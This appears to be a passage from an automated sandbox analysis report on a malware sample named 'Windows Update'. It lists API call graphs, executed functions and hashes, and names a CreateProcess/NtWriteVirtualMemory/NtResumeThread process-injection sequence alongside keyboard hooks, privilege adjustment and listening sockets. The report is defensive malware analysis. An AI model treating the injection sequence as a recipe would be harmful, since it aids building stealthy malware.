                                                                                    • 4ea730, 4ea892, 4ea8de, 4ea91e and 4ea9cd also have an exit edge to 4ea7f8 -> 4e89a9 (the bail-out path)

                                                                                  The CreateProcessA, repeated NtWriteVirtualMemory, NtResumeThread sequence under 4e8750 is the call order used to write a payload into a newly created process and then resume it; the remaining roots are single API wrappers.
51507 6444fa 51509 644535 LoadLibraryA 51507->51509 51510 644572 51509->51510 51281 643146 51282 64317b GetPerAdapterInfo 51281->51282 51284 6431ae 51282->51284 51285 644a46 51286 644a6f MessageBoxW 51285->51286 51288 644aa0 51286->51288 51511 6465c6 51512 6465fb CertVerifyCertificateChainPolicy 51511->51512 51514 64662a 51512->51514 51515 642dc6 51516 642dec DeleteFileW 51515->51516 51518 642e08 51516->51518 51519 642bc6 51520 642bf5 ShowWindow 51519->51520 51522 642c29 51519->51522 51521 642c0a 51520->51521 51522->51520 51289 64304e 51291 643083 GetAdaptersAddresses 51289->51291 51292 6430bc 51291->51292 51526 645cce 51527 645d06 PeekMessageW 51526->51527 51528 645d3a 51526->51528 51529 645d1b 51527->51529 51528->51527 51530 6453ca 51531 6453ff K32GetModuleInformation 51530->51531 51533 645436 51531->51533 51301 640c5d 51302 640c7a 51301->51302 51303 640c9c 51302->51303 51308 4e264e 51302->51308 51315 4e26e5 51302->51315 51322 4e2197 51302->51322 51329 4e1db8 51302->51329 51309 4e265f 51308->51309 51310 4e2ace 51309->51310 51336 4e70b8 51309->51336 51311 4e2d19 51310->51311 51341 4e7988 51310->51341 51345 4e797a 51310->51345 51311->51302 51316 4e26f6 51315->51316 51317 4e2ace 51316->51317 51319 4e70b8 2 API calls 51316->51319 51318 4e2d19 51317->51318 51320 4e797a KiUserCallbackDispatcher 51317->51320 51321 4e7988 KiUserCallbackDispatcher 51317->51321 51318->51302 51319->51317 51320->51318 51321->51318 51323 4e21a8 51322->51323 51324 4e2ace 51323->51324 51326 4e70b8 2 API calls 51323->51326 51325 4e2d19 51324->51325 51327 4e797a KiUserCallbackDispatcher 51324->51327 51328 4e7988 KiUserCallbackDispatcher 51324->51328 51325->51302 51326->51324 51327->51325 51328->51325 51330 4e1dee 51329->51330 51331 4e2ace 51330->51331 51333 4e70b8 2 API calls 51330->51333 51332 4e2d19 51331->51332 51334 4e797a KiUserCallbackDispatcher 51331->51334 51335 4e7988 KiUserCallbackDispatcher 51331->51335 51332->51302 51333->51331 51334->51332 51335->51332 51337 4e70e0 51336->51337 51338 
4e7173 51337->51338 51349 641866 51337->51349 51352 641833 51337->51352 51338->51310 51342 4e799a KiUserCallbackDispatcher 51341->51342 51344 4e79cc 51342->51344 51344->51311 51346 4e79b2 KiUserCallbackDispatcher 51345->51346 51347 4e7983 51345->51347 51348 4e79cc 51346->51348 51347->51346 51348->51311 51350 6418b6 SetWindowsHookExA 51349->51350 51351 6418be 51350->51351 51351->51338 51353 641866 SetWindowsHookExA 51352->51353 51355 6418be 51353->51355 51355->51338 51356 64385e 51357 643893 RegNotifyChangeKeyValue 51356->51357 51359 6438d0 51357->51359 51360 64105e 51361 641096 accept 51360->51361 51363 6410d1 51361->51363 51364 642f5e 51366 642f96 LocalAlloc 51364->51366 51367 642fc6 51366->51367 51534 644bde 51537 644c07 SetFileAttributesW 51534->51537 51536 644c23 51537->51536 51368 11bc2a 51369 11bc62 CreateFileW 51368->51369 51371 11bcb1 51369->51371 51372 64365a 51373 643692 RegOpenCurrentUser 51372->51373 51375 6436c5 51373->51375 51538 11a8ae 51539 11a8da LocalFree 51538->51539 51540 11a910 51538->51540 51541 11a8e8 51539->51541 51540->51539 51376 640426 51377 64045e OpenFileMappingW 51376->51377 51379 640499 51377->51379 51380 640526 51382 64055e MapViewOfFile 51380->51382 51383 6405ad 51382->51383 51542 6433a6 51543 6433f6 FormatMessageW 51542->51543 51544 6433fe 51543->51544 51384 11b952 51385 11b9c2 51384->51385 51386 11b98a setsockopt 51384->51386 51385->51386 51387 11b998 51386->51387 51545 11bed2 51548 11bf07 setsockopt 51545->51548 51547 11bf39 51548->51547 51549 6408a2 51550 6408da CreateMutexW 51549->51550 51552 64091d 51550->51552 51388 11ab56 51391 11ab8e RegOpenKeyExW 51388->51391 51390 11abe4 51391->51390 51553 11a5d6 51554 11a614 DuplicateHandle 51553->51554 51555 11a64c 51553->51555 51556 11a622 51554->51556 51555->51554 51557 643caa 51558 643ce5 getaddrinfo 51557->51558 51560 643d57 51558->51560 51561 6409aa 51562 6409df listen 51561->51562 51564 640a08 51562->51564 51392 11ac5e 51394 11ac93 RegQueryValueExW 51392->51394 51395 11ace7 
51394->51395 51396 643236 51397 64326e getnameinfo 51396->51397 51399 6432d5 51397->51399 51400 11bd42 51403 11bd77 GetFileType 51400->51403 51402 11bda4 51403->51402 51404 64133a 51405 64138a CreateFileMappingW 51404->51405 51406 641392 51405->51406 51565 4e8a90 51567 4e8ac0 51565->51567 51566 4e8b88 51567->51566 51578 4e8dd8 51567->51578 51582 646906 CreateProcessA 51567->51582 51583 6468e0 CreateProcessA 51567->51583 51568 4e8c22 51569 4e8c26 51568->51569 51568->51578 51590 646a6a NtResumeThread 51568->51590 51570 4e8c53 51593 646ae5 NtWriteVirtualMemory 51570->51593 51594 646b12 NtWriteVirtualMemory 51570->51594 51571 4e8c6e 51571->51578 51584 646ae5 NtWriteVirtualMemory 51571->51584 51585 646b12 NtWriteVirtualMemory 51571->51585 51572 4e8d5d 51574 4e8d8a 51572->51574 51572->51578 51573 4e8cae 51573->51572 51573->51578 51588 646ae5 NtWriteVirtualMemory 51573->51588 51589 646b12 NtWriteVirtualMemory 51573->51589 51591 646ae5 NtWriteVirtualMemory 51574->51591 51592 646b12 NtWriteVirtualMemory 51574->51592 51575 4e8d9f 51580 646a6a NtResumeThread 51575->51580 51576 4e8dbc 51581 646a6a NtResumeThread 51576->51581 51577 4e8dc9 51579 4e9bc2 51578->51579 51586 4ea6d0 5 API calls 51578->51586 51587 4ea700 5 API calls 51578->51587 51580->51576 51581->51577 51582->51568 51583->51568 51584->51573 51585->51573 51586->51579 51587->51579 51588->51573 51589->51573 51590->51570 51591->51575 51592->51575 51593->51571 51594->51571 51595 644fba 51596 644fe9 AdjustTokenPrivileges 51595->51596 51598 64500b 51596->51598 51599 6419ba 51600 6419e6 LoadLibraryShim 51599->51600 51602 641a14 51600->51602 51603 640dba 51605 640def bind 51603->51605 51606 640e23 51605->51606 51407 11b84e 51408 11b886 WSASocketW 51407->51408 51410 11b8c2 51408->51410 51607 643486 51610 6434bb WSAIoctl 51607->51610 51609 643509 51610->51609 51411 11a172 51412 11a19d gethostname 51411->51412 51413 11a1c4 51412->51413 51414 623104 51415 623067 51414->51415 51417 6230a8 51415->51417 51419 4eab2f 51415->51419 
51424 4eab40 51415->51424 51420 4eab40 51419->51420 51429 4ec3aa 51420->51429 51434 4ec3b8 51420->51434 51421 4eabb9 51421->51417 51425 4eab76 51424->51425 51427 4ec3aa 2 API calls 51425->51427 51428 4ec3b8 2 API calls 51425->51428 51426 4eabb9 51426->51417 51427->51426 51428->51426 51430 4ec3b8 51429->51430 51439 11a373 51430->51439 51443 11a3a6 51430->51443 51431 4ec407 51431->51421 51435 4ec3e2 51434->51435 51437 11a373 GetForegroundWindow 51435->51437 51438 11a3a6 GetForegroundWindow 51435->51438 51436 4ec407 51436->51421 51437->51436 51438->51436 51440 11a3a6 GetForegroundWindow 51439->51440 51442 11a3dd 51440->51442 51442->51431 51444 11a405 51443->51444 51445 11a3cf GetForegroundWindow 51443->51445 51444->51445 51446 11a3dd 51445->51446 51446->51431 51447 642d02 51448 642d60 51447->51448 51449 642d2e FindClose 51447->51449 51448->51449 51450 642d43 51449->51450 51611 640f82 51614 640fb7 ioctlsocket 51611->51614 51613 640fe3 51614->51613 51451 64190e 51454 641934 AddAtomW 51451->51454 51453 641950 51454->51453 51615 64358e 51618 6435c3 RasConnectionNotificationA 51615->51618 51617 6435f6 51618->51617 51455 11ad7a 51456 11ada1 EnumThreadWindows 51455->51456 51457 11adcc 51456->51457 51619 11a2fa 51620 11a365 51619->51620 51621 11a326 CloseHandle 51619->51621 51620->51621 51622 11a334 51621->51622 51623 64508a 51625 6450bf K32EnumProcessModules 51623->51625 51626 6450ee 51625->51626 51631 643e8a 51632 643ebf WSAConnect 51631->51632 51634 643ede 51632->51634 51635 64278a 51636 6427bf SendMessageW 51635->51636 51637 6427ea 51635->51637 51638 6427d4 51636->51638 51637->51636 51639 64149e 51640 6414ca UnmapViewOfFile 51639->51640 51641 64150b 51639->51641 51642 6414d8 51640->51642 51641->51640 51643 640e9e 51644 640ed3 getsockname 51643->51644 51646 640f07 51644->51646 51458 11bb6a 51459 11bb96 GetFileAttributesExW 51458->51459 51461 11bbb2 51459->51461 51462 645c1a 51463 645c83 51462->51463 51464 645c4f PostMessageW 51462->51464 51463->51464 51465 645c64 
51464->51465 51466 64521a 51469 645243 CopyFileW 51466->51469 51468 64526a 51469->51468 51647 642e9a 51648 642ecf GetAdaptersInfo 51647->51648 51650 642eff 51648->51650

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: 9c3025a5d53c8f969c2e30bcef19614978566771f8172a5000e89449af70141e
                                                                                  • Instruction ID: 6cfabaec72b4d03b8e9dfb29443daeb50c2715610eb1aa4239d2d143b13d2491
                                                                                  • Opcode Fuzzy Hash: 9c3025a5d53c8f969c2e30bcef19614978566771f8172a5000e89449af70141e
                                                                                  • Instruction Fuzzy Hash: 9C219175509380AFE712CB61DC44F96BFB8EF06310F08849BE944CB292D275A909CB75
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 6582d465e1e665ebc546972b1177416f52828f2a2815822845a345cbdabb84e5
                                                                                  • Instruction ID: e339eef02771f66e2e17cbe544e7b1b95a6bf91847623536a7b5734239b0b8f5
                                                                                  • Opcode Fuzzy Hash: 6582d465e1e665ebc546972b1177416f52828f2a2815822845a345cbdabb84e5
                                                                                  • Instruction Fuzzy Hash: 8421D6B5404384AFF712CB50DC45F96BFA8EF42324F09859AE9449F193D3746905C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00645003
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 2874748243-0
                                                                                  • Opcode ID: c125415af5997b7148adafb4ae916e64742145e1280b5e8cca85e587470e1256
                                                                                  • Instruction ID: 5a15bb9143d44990d3a9129b96463037d63e5c7840753ca7c436ae18fc3eca5e
                                                                                  • Opcode Fuzzy Hash: c125415af5997b7148adafb4ae916e64742145e1280b5e8cca85e587470e1256
                                                                                  • Instruction Fuzzy Hash: 2C21D1765097809FEB228F25DC45B92BFB4EF16310F0885DAE9858B663D371D908CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00642EF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3177971545-0
                                                                                  • Opcode ID: 45711f7d00cf33a0af7c1c46acb36a6c90ec3837c5aae7be711431d0ea4c6597
                                                                                  • Instruction ID: 7d58d6e000d53280ce87b43877077715c82ff208a61455e45c80176b9d96df1f
                                                                                  • Opcode Fuzzy Hash: 45711f7d00cf33a0af7c1c46acb36a6c90ec3837c5aae7be711431d0ea4c6597
                                                                                  • Instruction Fuzzy Hash: 7621B771409384AFE722CB11CC55F96FFB8EF46310F0885DBF9449B192C265A948CB72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction ID: 77eff2167ed3141de8a2522768950857e68d596fc29c7d153567f9b4767f0177
                                                                                  • Opcode Fuzzy Hash: 00e7234f5156e8bbf63f1330d227b70dc2491ed8d15ab262f54246e52ec87560
                                                                                  • Instruction Fuzzy Hash: 0A11BF76500304EFFB20CF51DC85FA6FBA8EF04720F14886AEE089B241D670A954CAB5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00646B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  • Opcode ID: f47ca7144207d34aa95ddc0e851e3c2240d293f6e8e96f8715a701b509f2bc46
                                                                                  • Instruction ID: d2ed8dfac410957edcd91c601935c74dfefe5afb9b02c4617abb7f8f2b41d9dc
                                                                                  • Opcode Fuzzy Hash: f47ca7144207d34aa95ddc0e851e3c2240d293f6e8e96f8715a701b509f2bc46
                                                                                  • Instruction Fuzzy Hash: 9E118471408380AFEB21CF55DC44BA2FFB4FF46360F08859AED848B152C376A458DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 5cca211827f425e0b15af838815455ca7afbd9383f8c2e8e6fbfccbed7c7c582
                                                                                  • Instruction ID: 7f04b24af0295ede871f8b365d4e904d3c120117aec5131259fce6460050f4a0
                                                                                  • Opcode Fuzzy Hash: 5cca211827f425e0b15af838815455ca7afbd9383f8c2e8e6fbfccbed7c7c582
                                                                                  • Instruction Fuzzy Hash: 4211E171500304EFFB21CF11DC85FAAFBA8EF44720F1484AAEE099B242D674A9458AB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006451AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationQuerySystem
                                                                                  • String ID:
                                                                                  • API String ID: 3562636166-0
                                                                                  • Opcode ID: af361f19c396372719bbf425a882bd9d413d5b962b52c4c2fb6ec7a836f6d653
                                                                                  • Instruction ID: f3df6036617a068a7092d9964e4b51c9faf840cd46c18dcc9a0258e0d63c0045
                                                                                  • Opcode Fuzzy Hash: af361f19c396372719bbf425a882bd9d413d5b962b52c4c2fb6ec7a836f6d653
                                                                                  • Instruction Fuzzy Hash: B911BF71509780AFDB228F11DC45EA2FFB4EF06320F0984DAED854B663C275A918CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetAdaptersInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00642EF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3177971545-0
                                                                                  • Opcode ID: f61dbd4e126d759adacf37be670db4e9fa8f0bdc7cb08b167aa1a351c2b755b2
                                                                                  • Instruction ID: a22e94537ee23e7bca88366942ed41b1aa17f14320afecbda6b45dc85a160536
                                                                                  • Opcode Fuzzy Hash: f61dbd4e126d759adacf37be670db4e9fa8f0bdc7cb08b167aa1a351c2b755b2
                                                                                  • Instruction Fuzzy Hash: C801F571500304EFFB21CF01DC85FA6FBA8EF04720F64849AFD089B281D675A949CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00645003
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPrivilegesToken
                                                                                  • String ID:
                                                                                  • API String ID: 2874748243-0
                                                                                  • Opcode ID: 35476ba088853992823f910b009aefdbb9a428b4508a77f6efc3e96a99627b52
                                                                                  • Instruction ID: e9f08b1e205cdb474a5ef0ba77990b159734031e1fa43359aceb83c17937c08a
                                                                                  • Opcode Fuzzy Hash: 35476ba088853992823f910b009aefdbb9a428b4508a77f6efc3e96a99627b52
                                                                                  • Instruction Fuzzy Hash: E611C236500700DFEB20CF55DC85B96FBE5EF04720F0884AAED4A8B652D771E808DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 00646B50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3527976591-0
                                                                                  • Opcode ID: 5ef36ee795f6b734ba68eb222e5411d66aa444dae645309b42558fda91f2a6b4
                                                                                  • Instruction ID: 60ba0a7f5d5a406cdc9851907bfadc69893c82c8e935749e4f988c77dc583f87
                                                                                  • Opcode Fuzzy Hash: 5ef36ee795f6b734ba68eb222e5411d66aa444dae645309b42558fda91f2a6b4
                                                                                  • Instruction Fuzzy Hash: 5801B171400700DFEB21CF55DC85B96FFA1EF15320F0884AAED498B622C372A418DBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: recv
                                                                                  • String ID:
                                                                                  • API String ID: 1507349165-0
                                                                                  • Opcode ID: 99fdd81276d448ed5d5848b7c1b215b626990d86f2ac74e282c73ba1d2081be0
                                                                                  • Instruction ID: b21d5d3106c9f44d25fdedfb88a3295195848cabce099f231fd6fd344d7b237e
                                                                                  • Opcode Fuzzy Hash: 99fdd81276d448ed5d5848b7c1b215b626990d86f2ac74e282c73ba1d2081be0
                                                                                  • Instruction Fuzzy Hash: 2C01DF71501740DFEB20CF55DD84BA6FFA0EF08320F48C4AAED498B612D372A488DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: e22cd93fb48cf7e5b7bd124cffe9b0b7bd86feb3790976a58e837621f947f197
                                                                                  • Instruction ID: eaf4f32f865a33ed2968dc352799ff1e515001f563ba765aecf65a921af9f3df
                                                                                  • Opcode Fuzzy Hash: e22cd93fb48cf7e5b7bd124cffe9b0b7bd86feb3790976a58e837621f947f197
                                                                                  • Instruction Fuzzy Hash: A601AD75500740DFEB20CF55DC89BA5FFA5EF05720F18C8AAED099B212D276A848CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 006451AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationQuerySystem
                                                                                  • String ID:
                                                                                  • API String ID: 3562636166-0
                                                                                  • Opcode ID: d7c9f69d801f9b97c3fd1db4a49af56689b64652129667f94899e5ba283f9452
                                                                                  • Instruction ID: 44e11ad0efc612a84c6763e894568220afb439f029fca35b5bd62c498e079f50
                                                                                  • Opcode Fuzzy Hash: d7c9f69d801f9b97c3fd1db4a49af56689b64652129667f94899e5ba283f9452
                                                                                  • Instruction Fuzzy Hash: E9018B35400B40DFEB208F45D884B65FBA1EF04720F18849ADD4A0B612C272A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Graph image not captured; basic blocks from 643c20 to 643da5, getaddrinfo called in block 643d49-643d51
                                                                                  APIs
                                                                                  • getaddrinfo.WS2_32(?,00000E40), ref: 00643D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getaddrinfo
                                                                                  • String ID:
                                                                                  • API String ID: 300660673-0
                                                                                  • Opcode ID: 77127358b6a68896e58545f69365bfaff5c4b7e4c93d407213151c9b2390897b
                                                                                  • Instruction ID: f9b81877742fe15731c08135f43ea38ee0d52354702c0bc144b0b97cafee3eaa
                                                                                  • Opcode Fuzzy Hash: 77127358b6a68896e58545f69365bfaff5c4b7e4c93d407213151c9b2390897b
                                                                                  • Instruction Fuzzy Hash: BF51507150D3C0AFE7238B208C55BA6BFB8AF07214F0A45DBE584DF1A3D6695909C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Graph image not captured; basic blocks from 6431dc to 64332b, getnameinfo called in block 6432c7-6432cf
                                                                                  APIs
                                                                                  • getnameinfo.WS2_32(?,00000E40), ref: 006432CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: getnameinfo
                                                                                  • String ID:
                                                                                  • API String ID: 1866240144-0
                                                                                  • Opcode ID: 42e4236ba361668cfd1d94778cfb954d9f430c795b2d84de5042528976df737d
                                                                                  • Instruction ID: 27f617282ffb8bd6ab1eeda40cd7dfe0a88cd359d7eaaefac81a6ba7b2182233
                                                                                  • Opcode Fuzzy Hash: 42e4236ba361668cfd1d94778cfb954d9f430c795b2d84de5042528976df737d
                                                                                  • Instruction Fuzzy Hash: 944171724083846FE722CB658C91FA6BFB8EF07310F0944DBE984CB1A3D6659A09C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Graph image not captured; basic blocks from 11b729 to 11b826, RegQueryValueExW called in block 11b7b2-11b80a
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0011B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 25e7a7b442c54d16ab0e256aa063adcf63cbe9718eb1dbcc6cc3bcc981f23c99
                                                                                  • Instruction ID: 99fb200ba8c645813a02644d71f7bb7819d111b206e78cfb65b13dd96c165b35
                                                                                  • Opcode Fuzzy Hash: 25e7a7b442c54d16ab0e256aa063adcf63cbe9718eb1dbcc6cc3bcc981f23c99
                                                                                  • Instruction Fuzzy Hash: 4141492540E3C0AFD3139B358C65A61BFB4EF47620F0E85DBD8848F5A3D2296919D7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Graph image not captured; basic blocks from 6468e0 to 646a21, CreateProcessA called in block 6469ca-6469d2
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,00000E40), ref: 006469D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: e276b06628f5927942808ca915414a27fbd4e589bfc38fe8b6c9bf82fb0b92db
                                                                                  • Instruction ID: fcdba9f5328f618fa480e8311c6c7e2f75dd2b6023d5261a4f402e14cbaf449e
                                                                                  • Opcode Fuzzy Hash: e276b06628f5927942808ca915414a27fbd4e589bfc38fe8b6c9bf82fb0b92db
                                                                                  • Instruction Fuzzy Hash: EC319D72200341AFEB21CF55CC41FA7BBECEF09710F0485AAFA859A191D776E948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Graph image not captured; basic blocks from 64342c to 643549, WSAIoctl called in block 6434fb-643503
                                                                                  APIs
                                                                                  • WSAIoctl.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00643501
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ioctl
                                                                                  • String ID:
                                                                                  • API String ID: 3041054344-0
                                                                                  • Opcode ID: e131be84c83574c0e2459e0c835c220d721f94acd2412c739abc8551dec6bb5f
                                                                                  • Instruction ID: ca75c0c106e70da863ce2dcbef1f4a0255b92e545aa267974936c5f99f668618
                                                                                  • Opcode Fuzzy Hash: e131be84c83574c0e2459e0c835c220d721f94acd2412c739abc8551dec6bb5f
                                                                                  • Instruction Fuzzy Hash: 4D4181715097C09FE723CB208C54F92BFB8EF06714F0985DBE985CB5A3D225A909C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph
                                                                                  • Graph image not captured; basic blocks from 6449be to 644ac2, MessageBoxW called in block 644a8b-644a9e
